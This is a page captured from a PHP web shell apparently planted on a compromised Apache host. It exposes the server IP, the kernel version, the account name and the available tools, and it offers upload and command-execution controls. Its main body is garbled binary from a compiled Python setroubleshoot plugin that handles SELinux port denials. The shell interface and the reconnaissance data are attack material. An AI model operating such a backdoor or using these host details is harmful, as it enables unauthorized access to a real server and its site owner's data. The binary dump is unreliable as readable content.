403Webshell
Server IP : 68.178.164.50  /  Your IP : 216.73.216.142
Web Server : Apache
System : Linux 50.164.178.68.host.secureserver.net 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : rathinambschool ( 1053)
PHP Version : 8.2.30
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/setroubleshoot/plugins/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/setroubleshoot/plugins/__pycache__/connect_ports.cpython-39.opt-1.pyc
a

�Z`�
�@sDddlZejddd�ZejZddlTddlmZGdd�de�ZdS)	�Nzsetroubleshoot-pluginsT)Zfallback)�*)�Pluginc@sLeZdZed�Zed�Zed�ZdZed�ZdZ	dd�Z
d	d
�Zdd�Zd
S)�pluginzR
    SELinux is preventing $SOURCE_PATH from connecting to port $PORT_NUMBER.
    a�
    SELinux has denied $SOURCE from connecting to a network port $PORT_NUMBER which does not have an SELinux type associated with it.
    If $SOURCE should be allowed to connect on $PORT_NUMBER, use the <i>semanage</i> command to assign $PORT_NUMBER to a port type that $SOURCE_TYPE can connect to (%s).
    

If $SOURCE is not supposed
    to connect to $PORT_NUMBER, this could signal an intrusion attempt.
    z�
    If you want to allow $SOURCE to connect to $PORT_NUMBER, you can execute 

    # semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER

    where PORT_TYPE is one of the following: %s.
    �zIIf you want to allow $SOURCE_PATH to connect to network port $PORT_NUMBERz!you need to modify the port type.cCsB|d�d�}t|�dkr&td�|Std�|d|dfSdS)N��,zc# semanage port -a -t PORT_TYPE -p %s $PORT_NUMBER
    where PORT_TYPE is one of the following: %s.z+# semanage port -a -t %s -p %s $PORT_NUMBERr)�split�len�_)�self�avcZoptionsZports�r
�2/usr/share/setroubleshoot/plugins/connect_ports.py�get_do_text0s�zplugin.get_do_textcCst�|t�|�d�dS)N�d)r�__init__�__name__Zset_priority)rr
r
rr8szplugin.__init__cCsJ|�gd��rF|�dg�rF|��}|rF|�|j�d�dd�|�f�SdS)N)Zhi_reserved_port_tZreserved_port_tZport_tZunreserved_port_tZname_connectr
rz, )Zmatches_target_typesZhas_any_access_inZallowed_target_typesZreportZtclassr�join)rrZ
allowed_typesr
r
r�analyze<s
� zplugin.analyzeN)
r�
__module__�__qualname__r
ZsummaryZproblem_descriptionZfix_descriptionZfix_cmdZif_textZ	then_textrrrr
r
r
rrsr)�gettextZtranslationr
Zsetroubleshoot.utilZsetroubleshoot.Pluginrrr
r
r
r�<module>s


Youez - 2016 - github.com/yon3zu
LinuXploit